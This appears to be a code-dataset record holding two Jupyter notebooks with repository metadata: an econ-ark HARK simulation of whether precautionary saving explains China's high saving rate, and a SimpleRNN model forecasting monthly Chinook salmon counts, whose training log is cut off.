"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2bc88e8c522322f823f1fd9bf23c026ec28a08 | 25,979 | ipynb | Jupyter Notebook | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | notebooks/.ipynb_checkpoints/Chinese-Growth-checkpoint.ipynb | iworld1991/DemARK_course | 72b96b220fb8e1d732bad4915b4bd490f389f22a | [
"Apache-2.0"
] | null | null | null | 49.67304 | 571 | 0.644174 | [
[
[
"# Initial imports and notebook setup, click arrow to show\n%matplotlib inline\n# The first step is to be able to bring things in from different directories\nimport sys \nimport os\nsys.path.insert(0, os.path.abspath('../lib'))\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom copy import deepcopy\nfrom util import log_progress\nimport HARK # Prevents import error from Demos repo",
"_____no_output_____"
]
],
[
[
"# Do Precautionary Motives Explain China's High Saving Rate?\n\nThe notebook [Nondurables-During-Great-Recession](http://econ-ark.org/notebooks/) shows that the collapse in consumer spending in the U.S. during the Great Recession could easily have been caused by a moderate and plausible increase in the degree of uncertainty.\n\nBut that exercise might make you worry that invoking difficult-to-measure \"uncertainty\" can explain anything (e.g. \"the stock market fell today because the risk aversion of the representative agent increased\").\n\nThe next exercise is designed to show that there are limits to the phenomena that can be explained by invoking plausible changes in uncertainty.\n\nThe specific question is whether a high degree of uncertainty can explain China's very high saving rate (approximately 25 percent), as some papers have proposed. Specifically, we ask \"what beliefs about uncertainty would Chinese consumers need to hold in order to generate a saving rate of 25 percent, given the rapid pace of Chinese growth?\"\n\n### The Thought Experiment\n\nIn more detail, our consumers will initially live in a stationary, low-growth environment (intended to approximate China before 1978). Then, unexpectedly, income growth will surge at the same time that income uncertainty increases (intended to approximate the effect of economic reforms in China since 1978.) Consumers believe the high-growth, high-uncertainty state is highly persistent, but that ultimately growth will slow to a \"normal\" pace matching that of other advanced countries.\n",
"_____no_output_____"
],
[
"### The Baseline Model\n\nWe want the model to have these elements:\n0. \"Standard\" infinite horizon consumption/savings model, with mortality and permanent and temporary shocks to income\n0. The capacity to provide a reasonable match to the distribution of wealth inequality in advanced economies\n0. Ex-ante heterogeneity in consumers' discount factors (to capture wealth inequality)\n\nAll of these are features of the model in the paper [\"The Distribution of Wealth and the Marginal Propensity to Consume\" by Carroll, Slacalek, Tokuoka, and White (2017)](http://econ.jhu.edu/people/ccarroll/papers/cstwMPC), for which all of the computational results were produced using the HARK toolkit. The results for that paper are available in the $\\texttt{cstwMPC}$ directory.\n\n### But With A Different ConsumerType\n\nOne feature that was not present in that model is important here: \n- A Markov state that represents the state of the Chinese economy (to be detailed later)\n\nHARK's $\\texttt{MarkovConsumerType}$ is the right tool for this experiment. So we need to prepare the parameters to create that ConsumerType, and then create it.",
"_____no_output_____"
]
],
[
[
"# Initialize the cstwMPC parameters\ninit_China_parameters = {\n \"CRRA\":1.0, # Coefficient of relative risk aversion \n \"Rfree\":1.01/(1.0 - 1.0/160.0), # Survival probability,\n \"PermGroFac\":[1.000**0.25], # Permanent income growth factor (no perm growth),\n \"PermGroFacAgg\":1.0,\n \"BoroCnstArt\":0.0,\n \"CubicBool\":False,\n \"vFuncBool\":False,\n \"PermShkStd\":[(0.01*4/11)**0.5], # Standard deviation of permanent shocks to income\n \"PermShkCount\":5, # Number of points in permanent income shock grid\n \"TranShkStd\":[(0.01*4)**0.5], # Standard deviation of transitory shocks to income,\n \"TranShkCount\":5, # Number of points in transitory income shock grid\n \"UnempPrb\":0.07, # Probability of unemployment while working\n \"IncUnemp\":0.15, # Unemployment benefit replacement rate\n \"UnempPrbRet\":None,\n \"IncUnempRet\":None,\n \"aXtraMin\":0.00001, # Minimum end-of-period assets in grid\n \"aXtraMax\":20, # Maximum end-of-period assets in grid\n \"aXtraCount\":20, # Number of points in assets grid,\n \"aXtraExtra\":[None],\n \"aXtraNestFac\":3, # Number of times to 'exponentially nest' when constructing assets grid\n \"LivPrb\":[1.0 - 1.0/160.0], # Survival probability\n \"DiscFac\":0.97, # Default intertemporal discount factor, # dummy value, will be overwritten\n \"cycles\":0,\n \"T_cycle\":1,\n \"T_retire\":0,\n 'T_sim':1200, # Number of periods to simulate (idiosyncratic shocks model, perpetual youth)\n 'T_age': 400,\n 'IndL': 10.0/9.0, # Labor supply per individual (constant),\n 'aNrmInitMean':np.log(0.00001),\n 'aNrmInitStd':0.0,\n 'pLvlInitMean':0.0,\n 'pLvlInitStd':0.0,\n 'AgentCount':0, # will be overwritten by parameter distributor\n}",
"_____no_output_____"
]
],
[
[
"### Set Up the Growth Process\n\nFor a Markov model, we need a Markov transition array. Here, we create that array.\nRemember, for this simple example, we just have a low-growth state, and a high-growth state",
"_____no_output_____"
]
],
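Written out, with rows indexing today's state and columns next quarter's state (low growth listed first, matching the code below), the perceived transition matrix is

$$\Pi = \begin{pmatrix} 1 & 0 \\ \tfrac{1}{160} & \tfrac{159}{160} \end{pmatrix},$$

i.e. agents believe the low-growth state is absorbing, while the high-growth state ends with probability $1/160$ per quarter (an expected duration of 160 quarters, or 40 years).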
[
[
"StateCount = 2 #number of Markov states\nProbGrowthEnds = (1./160.) #probability agents assign to the high-growth state ending\nMrkvArray = np.array([[1.,0.],[ProbGrowthEnds,1.-ProbGrowthEnds]]) #Markov array\ninit_China_parameters['MrkvArray'] = [MrkvArray] #assign the Markov array as a parameter",
"_____no_output_____"
]
],
[
[
"One other parameter needs to change: the number of agents in simulation. We want to increase this, because later on when we vastly increase the variance of the permanent income shock, things get wonky. (We need to change this value here, before we have used the parameters to initialize the $\\texttt{MarkovConsumerType}$, because this parameter is used during initialization.)\n\nOther parameters that are not used during initialization can also be assigned here, by changing the appropriate value in the $\\texttt{init_China_parameters_dictionary}$; however, they can also be changed later, by altering the appropriate attribute of the initialized $\\texttt{MarkovConsumerType}$.",
"_____no_output_____"
]
],
[
[
"init_China_parameters['AgentCount'] = 10000",
"_____no_output_____"
]
],
[
[
"### Import and initialize the Agents\n\nHere, we bring in an agent making a consumption/savings decision every period, subject to transitory and permanent income shocks, AND a Markov shock",
"_____no_output_____"
]
],
[
[
"from HARK.ConsumptionSaving.ConsMarkovModel import MarkovConsumerType\nChinaExample = MarkovConsumerType(**init_China_parameters)",
"_____no_output_____"
]
],
[
[
"Currently, Markov states can differ in their interest factor, permanent growth factor, survival probability, and income distribution. Each of these needs to be specifically set.\n\nDo that here, except income distribution, which will be done later (because we want to examine the consequences of different income distributions).",
"_____no_output_____"
]
],
[
[
"ChinaExample.assignParameters(PermGroFac = [np.array([1.,1.06 ** (.25)])], #needs to be a list, with 0th element of shape of shape (StateCount,)\n Rfree = np.array(StateCount*[init_China_parameters['Rfree']]), #need to be an array, of shape (StateCount,)\n LivPrb = [np.array(StateCount*[init_China_parameters['LivPrb']][0])], #needs to be a list, with 0th element of shape of shape (StateCount,)\n cycles = 0)\n\nChinaExample.track_vars = ['aNrmNow','cNrmNow','pLvlNow'] # Names of variables to be tracked",
"_____no_output_____"
]
],
[
[
"Now, add in ex-ante heterogeneity in consumers' discount factors\n\nThe cstwMPC parameters do not define a discount factor, since there is ex-ante heterogeneity in the discount factor. To prepare to create this ex-ante heterogeneity, first create the desired number of consumer types:\n",
"_____no_output_____"
]
],
[
[
"num_consumer_types = 7 # declare the number of types we want\nChineseConsumerTypes = [] # initialize an empty list\n\nfor nn in log_progress(range(num_consumer_types), every=1):\n # Now create the types, and append them to the list ChineseConsumerTypes\n newType = deepcopy(ChinaExample) \n ChineseConsumerTypes.append(newType)",
"_____no_output_____"
]
],
[
[
"\nNow, generate the desired ex-ante heterogeneity, by giving the different consumer types each with their own discount factor.\n\nFirst, decide the discount factors to assign:",
"_____no_output_____"
]
],
[
[
"from HARK.utilities import approxUniform\n\nbottomDiscFac = 0.9800\ntopDiscFac = 0.9934 \nDiscFac_list = approxUniform(N=num_consumer_types,bot=bottomDiscFac,top=topDiscFac)[1]\n\n# Now, assign the discount factors we want to the ChineseConsumerTypes\nfor j in log_progress(range(num_consumer_types), every=1):\n ChineseConsumerTypes[j].DiscFac = DiscFac_list[j]",
"_____no_output_____"
]
],
[
[
"## Setting Up the Experiment\n\nThe experiment is performed by a function we will now write.\n\nRecall that all parameters have been assigned appropriately, except for the income process.\n\nThis is because we want to see how much uncertainty needs to accompany the high-growth state to generate the desired high savings rate.\n\nTherefore, among other things, this function will have to initialize and assign the appropriate income process.",
"_____no_output_____"
]
],
[
[
"# First create the income distribution in the low-growth state, which we will not change\nfrom HARK.ConsumptionSaving.ConsIndShockModel import constructLognormalIncomeProcessUnemployment\nimport HARK.ConsumptionSaving.ConsumerParameters as IncomeParams\n\nLowGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]\n\n# Remember the standard deviation of the permanent income shock in the low-growth state for later\nLowGrowth_PermShkStd = IncomeParams.PermShkStd\n\n\n\ndef calcNatlSavingRate(PrmShkVar_multiplier,RNG_seed = 0):\n \"\"\"\n This function actually performs the experiment we want.\n \n Remember this experiment is: get consumers into the steady-state associated with the low-growth\n regime. Then, give them an unanticipated shock that increases the income growth rate\n and permanent income uncertainty at the same time. What happens to the path for \n the national saving rate? Can an increase in permanent income uncertainty\n explain the high Chinese saving rate since economic reforms began?\n \n The inputs are:\n * PrmShkVar_multiplier, the number by which we want to multiply the variance\n of the permanent shock in the low-growth state to get the variance of the\n permanent shock in the high-growth state\n * RNG_seed, an integer to seed the random number generator for simulations. This useful\n because we are going to run this function for different values of PrmShkVar_multiplier,\n and we may not necessarily want the simulated agents in each run to experience\n the same (normalized) shocks.\n \"\"\"\n\n # First, make a deepcopy of the ChineseConsumerTypes (each with their own discount factor), \n # because we are going to alter them\n ChineseConsumerTypesNew = deepcopy(ChineseConsumerTypes)\n\n # Set the uncertainty in the high-growth state to the desired amount, keeping in mind\n # that PermShkStd is a list of length 1\n PrmShkStd_multiplier = PrmShkVar_multiplier ** .5\n IncomeParams.PermShkStd = [LowGrowth_PermShkStd[0] * PrmShkStd_multiplier] \n\n # Construct the appropriate income distributions\n HighGrowthIncomeDstn = constructLognormalIncomeProcessUnemployment(IncomeParams)[0][0]\n\n # To calculate the national saving rate, we need national income and national consumption\n # To get those, we are going to start national income and consumption at 0, and then\n # loop through each agent type and see how much they contribute to income and consumption.\n NatlIncome = 0.\n NatlCons = 0.\n\n for ChineseConsumerTypeNew in ChineseConsumerTypesNew:\n ### For each consumer type (i.e. each discount factor), calculate total income \n ### and consumption\n\n # First give each ConsumerType their own random number seed\n RNG_seed += 19\n ChineseConsumerTypeNew.seed = RNG_seed\n \n # Set the income distribution in each Markov state appropriately \n ChineseConsumerTypeNew.IncomeDstn = [[LowGrowthIncomeDstn,HighGrowthIncomeDstn]]\n\n # Solve the problem for this ChineseConsumerTypeNew\n ChineseConsumerTypeNew.solve()\n\n \"\"\"\n Now we are ready to simulate.\n \n This case will be a bit different than most, because agents' *perceptions* of the probability\n of changes in the Chinese economy will differ from the actual probability of changes. \n Specifically, agents think there is a 0% chance of moving out of the low-growth state, and \n that there is a (1./160) chance of moving out of the high-growth state. In reality, we \n want the Chinese economy to reach the low growth steady state, and then move into the \n high growth state with probability 1. 
Then we want it to persist in the high growth \n state for 40 years. \n \"\"\"\n \n ## Now, simulate 500 quarters to get to steady state, then 40 years of high growth\n ChineseConsumerTypeNew.T_sim = 660 \n \n # Ordinarily, the simulate method for a MarkovConsumerType randomly draws Markov states\n # according to the transition probabilities in MrkvArray *independently* for each simulated\n # agent. In this case, however, we want the discrete state to be *perfectly coordinated*\n # across agents-- it represents a macroeconomic state, not a microeconomic one! In fact,\n # we don't want a random history at all, but rather a specific, predetermined history: 125\n # years of low growth, followed by 40 years of high growth.\n \n # To do this, we're going to \"hack\" our consumer type a bit. First, we set the attribute\n # MrkvPrbsInit so that all of the initial Markov states are in the low growth state. Then\n # we initialize the simulation and run it for 500 quarters. However, as we do not\n # want the Markov state to change during this time, we change its MrkvArray to always be in\n # the low growth state with probability 1.\n \n ChineseConsumerTypeNew.MrkvPrbsInit = np.array([1.0,0.0]) # All consumers born in low growth state\n ChineseConsumerTypeNew.MrkvArray[0] = np.array([[1.0,0.0],[1.0,0.0]]) # Stay in low growth state\n ChineseConsumerTypeNew.initializeSim() # Clear the history and make all newborn agents\n ChineseConsumerTypeNew.simulate(500) # Simulate 500 quarders of data\n \n # Now we want the high growth state to occur for the next 160 periods. We change the initial\n # Markov probabilities so that any agents born during this time (to replace an agent who\n # died) is born in the high growth state. Moreover, we change the MrkvArray to *always* be\n # in the high growth state with probability 1. Then we simulate 160 more quarters.\n \n ChineseConsumerTypeNew.MrkvPrbsInit = np.array([0.0,1.0]) # All consumers born in low growth state\n ChineseConsumerTypeNew.MrkvArray[0] = np.array([[0.0,1.0],[0.0,1.0]]) # Stay in low growth state\n ChineseConsumerTypeNew.simulate(160) # Simulate 160 quarders of data\n \n # Now, get the aggregate income and consumption of this ConsumerType over time\n IncomeOfThisConsumerType = np.sum((ChineseConsumerTypeNew.aNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist*\n (ChineseConsumerTypeNew.Rfree[0] - 1.)) +\n ChineseConsumerTypeNew.pLvlNow_hist, axis=1)\n \n ConsOfThisConsumerType = np.sum(ChineseConsumerTypeNew.cNrmNow_hist*ChineseConsumerTypeNew.pLvlNow_hist,axis=1)\n \n # Add the income and consumption of this ConsumerType to national income and consumption\n NatlIncome += IncomeOfThisConsumerType\n NatlCons += ConsOfThisConsumerType\n\n \n # After looping through all the ConsumerTypes, calculate and return the path of the national \n # saving rate\n NatlSavingRate = (NatlIncome - NatlCons)/NatlIncome\n\n return NatlSavingRate",
"_____no_output_____"
]
],
[
[
"Now we can use the function we just defined to calculate the path of the national saving rate following the economic reforms, for a given value of the increase to the variance of permanent income accompanying the reforms. We are going to graph this path for various values for this increase.\n\nRemember, we want to see if any plausible value for this increase can explain the high Chinese saving rate.",
"_____no_output_____"
]
],
[
[
"# Declare the number of periods before the reforms to plot in the graph\nquarters_before_reform_to_plot = 5\n\n# Declare the quarters we want to plot results for\nquarters_to_plot = np.arange(-quarters_before_reform_to_plot ,160,1)\n\n# Create a list to hold the paths of the national saving rate\nNatlSavingsRates = []\n\n# Create a list of floats to multiply the variance of the permanent shock to income by\nPermShkVarMultipliers = (1.,2.,4.,8.,11.)\n\n# Loop through the desired multipliers, then get the path of the national saving rate\n# following economic reforms, assuming that the variance of the permanent income shock\n# was multiplied by the given multiplier\nindex = 0\nfor PermShkVarMultiplier in log_progress(PermShkVarMultipliers, every=1):\n NatlSavingsRates.append(calcNatlSavingRate(PermShkVarMultiplier,RNG_seed = index)[-160 - quarters_before_reform_to_plot :])\n index +=1",
"_____no_output_____"
]
],
[
[
"We've calculated the path of the national saving rate as we wanted. All that's left is to graph the results!",
"_____no_output_____"
]
],
[
[
"plt.ylabel('Natl Savings Rate')\nplt.xlabel('Quarters Since Economic Reforms')\nplt.plot(quarters_to_plot,NatlSavingsRates[0],label=str(PermShkVarMultipliers[0]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[1],label=str(PermShkVarMultipliers[1]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[2],label=str(PermShkVarMultipliers[2]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[3],label=str(PermShkVarMultipliers[3]) + ' x variance')\nplt.plot(quarters_to_plot,NatlSavingsRates[4],label=str(PermShkVarMultipliers[4]) + ' x variance')\nplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\nncol=2, mode=\"expand\", borderaxespad=0.) #put the legend on top\nplt.show()",
"_____no_output_____"
]
],
[
[
"The figure shows that, if the rate of growth increases the way Chinese growth did, but is not accompanied by any change in the degree of uncertainty, the saving rate declines drastically, from an initial (calibrated) value of about 0.1 (ten percent) to close to zero. For this model to have any hope of predicting an increase in the saving rate, it is clear that the increase in uncertainty that accompanies the increase in growth will have to be substantial. \n\nThe red line shows that a mere doubling of uncertainty from its baseline value is not enough: The steady state saving rate is still below its slow-growth value.\n\nWhen we assume that the degree of uncertainty quadruples, the model does finally predict that the new steady-state saving rate will be higher than before, but not much higher, and not remotely approaching 25 percent.\n\nOnly when the degree of uncertainty increases by a factor of 8 is the model capable of producing a new equilbrium saving rate in the ballpark of the Chinese value. \n\nBut this is getting close to a point where the model starts to break down (for both numerical and conceptual reasons), as shown by the erratic path of the saving rate when we multiply the initial variance by 11. \n\nWe do not have historical data on the magnitude of permanent income shocks in China in the pre-1978 period; it seems implausible that the degree of uncertainty could have increased by such a large amount, but in the absence of good data it is hard to know for sure. \n\nWhat the experiment does demonstrate, though, is that it is _not_ the case that \"it is easy to explain anything by invoking some plausible but unmeasurable change in uncertainty.\" Substantial differences in the degree of permanent (or highly persistent) income uncertainty across countries, across periods, and across people have been measured in many papers, and those differences could in principle be compared to differences in saving rates to get a firmer fix on the quantitative importance of the \"precautionary saving\" explanation in the Chinese context.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2bcec1785b2bf9666b6438a661dfd4b152eea2 | 218,167 | ipynb | Jupyter Notebook | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | null | null | null | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | 3 | 2021-06-02T21:21:25.000Z | 2021-06-03T23:51:09.000Z | .ipynb_checkpoints/monthly_simple_rnn-checkpoint.ipynb | Abdul-Omira/SalmonNet | 21479d8fb6b7972504395c637926592ba5f148da | [
"MIT"
] | 1 | 2021-05-20T20:18:47.000Z | 2021-05-20T20:18:47.000Z | 77.009178 | 60,720 | 0.616294 | [
[
[
"<h1> Simple Single Layer RNN with Monthly dataset</h1>",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np \nimport math\nimport pandas as pd \nimport seaborn as sns\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom keras.optimizers import SGD\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout, GRU, SimpleRNN\n#\"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv\"\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nplt.style.use('fivethirtyeight')",
"_____no_output_____"
],
[
"# salmon_data = pd.read_csv(r\"/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv\")\n# salmon_data.head()\n# salmon_copy = salmon_data # Create a copy for us to work with \ndef load_data(pathname):\n salmon_data = pd.read_csv(pathname)\n salmon_data.head()\n salmon_copy = salmon_data # Create a copy for us to work with \n salmon_copy.rename(columns = {\"mo\": \"month\", \"da\" : \"day\", \"fc\" : \"king\"}, \n inplace = True)\n salmon_copy['date']=pd.to_datetime(salmon_copy[['year','month','day']])\n# print(salmon_copy)\n king_data = salmon_copy.filter([\"date\",\"king\"], axis=1)\n# print(king_data)\n king_greater = king_data['date'].apply(pd.Timestamp) >= pd.Timestamp('01/01/1939')\n greater_than = king_data[king_greater]\n king_all = greater_than[greater_than['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2020')]\n king_all_copy = king_all\n king_all_copy = king_all_copy.reset_index()\n king_all_copy = king_all_copy.drop('index', axis=1)\n return king_all_copy, king_data",
"_____no_output_____"
],
[
" chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/passBonCS.csv'\n ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/data.csv'\n abdul_path = '/Users/abdul/Downloads/SalmonNet/data.csv'\n king_all_copy, king_data= load_data(chris_path)\n print(king_all_copy)",
" date king\n0 1939-01-01 0\n1 1939-01-02 0\n2 1939-01-03 0\n3 1939-01-04 1\n4 1939-01-05 0\n... ... ...\n24364 2020-12-25 0\n24365 2020-12-26 0\n24366 2020-12-27 0\n24367 2020-12-28 0\n24368 2020-12-29 0\n\n[24369 rows x 2 columns]\n"
],
[
"data_copy = king_all_copy\ndata_copy['date']\ndata_copy.set_index('date', inplace=True)\ndata_copy.index = pd.to_datetime(data_copy.index)\ndata_copy = data_copy.resample('1M').sum()\ndata_copy",
"_____no_output_____"
],
[
"print(data_copy)\ndata_copy.shape",
" king\ndate \n1939-01-31 6\n1939-02-28 12\n1939-03-31 121\n1939-04-30 51410\n1939-05-31 25159\n... ...\n2020-08-31 105269\n2020-09-30 254930\n2020-10-31 30917\n2020-11-30 843\n2020-12-31 9\n\n[984 rows x 1 columns]\n"
],
[
"data_copy.reset_index(inplace=True)\ndata_copy = data_copy.rename(columns = {'index':'date'})",
"_____no_output_____"
],
[
"print(data_copy)",
" date king\n0 1939-01-31 6\n1 1939-02-28 12\n2 1939-03-31 121\n3 1939-04-30 51410\n4 1939-05-31 25159\n.. ... ...\n979 2020-08-31 105269\n980 2020-09-30 254930\n981 2020-10-31 30917\n982 2020-11-30 843\n983 2020-12-31 9\n\n[984 rows x 2 columns]\n"
],
[
"def create_train_test(king_all):\n king_training_parse = king_all['date'].apply(pd.Timestamp) <= pd.Timestamp('12/31/2015')\n king_training = king_all[king_training_parse]\n king_training = king_training.reset_index()\n king_training = king_training.drop('index', axis=1)\n \n king_test_parse = king_all['date'].apply(pd.Timestamp) > pd.Timestamp('12/31/2015')\n king_test = king_all[king_test_parse]\n king_test = king_test.reset_index()\n king_test = king_test.drop('index', axis=1)\n print(king_test.shape)\n \n # Normalizing Data\n king_training[king_training[\"king\"] < 0] = 0 \n# print('max val king_train:')\n print(max(king_training['king']))\n king_test[king_test[\"king\"] < 0] = 0\n# print('max val king_test:')\n print(max(king_test['king']))\n king_train_pre = king_training[\"king\"].to_frame()\n# print(king_train_norm)\n king_test_pre = king_test[\"king\"].to_frame()\n scaler = MinMaxScaler(feature_range=(0, 1))\n king_train_norm = scaler.fit_transform(king_train_pre)\n king_test_norm = scaler.fit_transform(king_test_pre)\n print('king_test_norm')\n print(king_test_norm.shape)\n print('king_train_norm')\n print(king_train_norm.shape)\n #king_train_norm = (king_training[\"king\"] - np.min(king_training[\"king\"])) / (np.max(king_training[\"king\"]) - np.min(king_training[\"king\"]))\n #print(type(king_train_norm))\n #king_train_norm = king_train_norm.to_frame()\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n y_test_not_norm = []\n y_train_not_norm = []\n \n # Todo: Experiment with input size of input (ex. 30 days)\n \n for i in range(6,924): # 30\n x_train.append(king_train_norm[i-6:i])\n y_train.append(king_train_norm[i])\n for i in range(6, 60):\n x_test.append(king_test_norm[i-6:i])\n y_test.append(king_test_norm[i])\n \n # make y_test_not_norm\n for i in range(6, 60):\n y_test_not_norm.append(king_test['king'][i])\n for i in range(6,924): # 30\n y_train_not_norm.append(king_training['king'][i])\n \n return x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm",
"_____no_output_____"
],
[
"x_train, y_train, x_test, y_test, scaler, y_test_not_norm, y_train_not_norm = create_train_test(data_copy)\nx_train = np.array(x_train)\nx_test = np.array(x_test)\nx_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)).astype(np.float32)\nx_test = np.reshape(x_test, (x_test.shape[0],x_test.shape[1],1))\ny_train = np.array(y_train)\ny_test = np.array(y_test)\ny_test_not_norm = np.array(y_test_not_norm)\nprint(y_test.shape)\ny_test_not_norm = y_test_not_norm.reshape((y_test_not_norm.shape[0], 1))\nprint(y_test_not_norm.shape)\ny_train_not_norm = np.array(y_train_not_norm)\ny_train_not_norm = y_train_not_norm.reshape((y_train_not_norm.shape[0], 1))\nprint(y_train_not_norm.shape)\nprint(y_train.shape)",
"(60, 2)\n717915\n294611\nking_test_norm\n(60, 1)\nking_train_norm\n(924, 1)\n(54, 1)\n(54, 1)\n(918, 1)\n(918, 1)\n"
],
[
"def plot_predictions(test,predicted):\n plt.plot(test, color='red',label='Real Chinook Count')\n plt.plot(predicted, color='blue',label='Predicted Chinook Count')\n plt.title('Chinook Population Prediction')\n plt.xlabel('Time')\n plt.ylabel('Chinook Count')\n plt.legend()\n plt.show()\n \ndef plot_loss(history):\n plt.plot(history.history['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.show()\n\ndef return_rmse(test, predicted):\n rmse = math.sqrt(mean_squared_error(test, predicted))\n print(\"The root mean squared error is {}.\".format(rmse))\n \ndef month_to_year(month_preds):\n month_preds = month_preds[5:]\n print(len(month_preds))\n year_preds = []\n for i in range(12, len(month_preds), 12): \n salmon_count = np.sum(month_preds[i - 12:i])\n year_preds.append(salmon_count)\n year_preds = pd.DataFrame(year_preds, columns = [\"Count\"])\n return year_preds",
"_____no_output_____"
],
[
"def create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler):\n '''\n create single layer rnn model trained on x_train and y_train\n and make predictions on the x_test data\n '''\n # create a model\n model = Sequential()\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(32, return_sequences=True))\n model.add(SimpleRNN(1))\n model.add(Dense(1))\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n\n # fit the RNN model\n history = model.fit(x_train, y_train, epochs=1000, batch_size=64)\n\n print(\"predicting\")\n # Finalizing predictions\n RNN_train_preds = model.predict(x_train)\n RNN_test_preds = model.predict(x_test)\n \n #Descale\n RNN_train_preds = scaler.inverse_transform(RNN_train_preds)\n y_train = scaler.inverse_transform(y_train)\n RNN_test_preds = scaler.inverse_transform(RNN_test_preds)\n RNN_test_preds = RNN_test_preds.astype(np.int64)\n y_test = scaler.inverse_transform(y_test)\n# RNN_salmon_count = (RNN_preds * (np.max(king_training[\"king\"]) - np.min(king_training[\"king\"])) + np.min(king_training[\"king\"])).astype(np.int64)\n\n# why are we normalizing the test and train set, then un-normalizing (maybe this can cause problems in the sense tht we are\n# not comparing our preds to the proper y values)\n return model, RNN_train_preds, RNN_test_preds, history, y_train, y_test",
"_____no_output_____"
],
[
"model, RNN_train_preds, RNN_test_preds, history_RNN, y_train, y_test = create_single_layer_rnn_model(x_train, y_train, x_test, y_test, scaler)",
"Epoch 1/1000\n15/15 [==============================] - 2s 6ms/step - loss: 0.0345\nEpoch 2/1000\n15/15 [==============================] - ETA: 0s - loss: 0.012 - 0s 7ms/step - loss: 0.0122\nEpoch 3/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0097\nEpoch 4/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0079\nEpoch 5/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0104\nEpoch 6/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0098\nEpoch 7/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0075\nEpoch 8/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0084\nEpoch 9/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0060\nEpoch 10/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0084\nEpoch 11/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0074\nEpoch 12/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0090\nEpoch 13/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0081\nEpoch 14/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0072\nEpoch 15/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0093\nEpoch 16/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0065\nEpoch 17/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 18/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0077\nEpoch 19/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0070\nEpoch 20/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0073\nEpoch 21/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0082\nEpoch 22/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0078\nEpoch 23/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 24/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0063\nEpoch 25/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0083\nEpoch 26/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0060\nEpoch 27/1000\n15/15 [==============================] - 0s 6ms/step - loss: 